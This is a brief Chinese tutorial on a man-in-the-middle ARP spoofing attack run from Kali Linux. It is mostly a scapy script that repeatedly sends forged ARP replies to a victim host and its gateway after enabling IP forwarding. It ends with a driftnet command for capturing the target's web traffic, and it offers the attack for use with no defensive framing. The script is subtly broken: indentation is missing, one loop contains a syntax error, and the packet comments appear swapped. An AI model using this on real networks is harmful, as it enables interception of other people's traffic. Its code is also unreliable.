核心包scapy
实验地点:Kali虚拟机
首先必须打开Kali的IP转发功能,不然只能到达攻击的目的,达不到欺骗的目的
上代码:
echo 1 >> /proc/sys/net/ipv4/ip_forward
from scapy.all import *
from threading import Thread
import time
p1 = ARP()
p1.psrc = "被欺骗主机IP"
p1.pdst = "网关IP"
p2 = ARP()
p2.psrc = "网关IP"
p2.pdst = "被欺骗主机IP"
def qw():
for i in range(0, 500):
time.sleep(0.8)
send(p1)
#向目标发送欺骗包
def qr():
for i in range(0. 500):
time.sleep(0.8)
send(p2)
#向网关发送欺骗包
t1 = Thread(target = qw)
t2 = Thread(target = qr)
t1.start()
t2.start()
开启driftnet
即可监听目标上网数据
driftnet -i eth0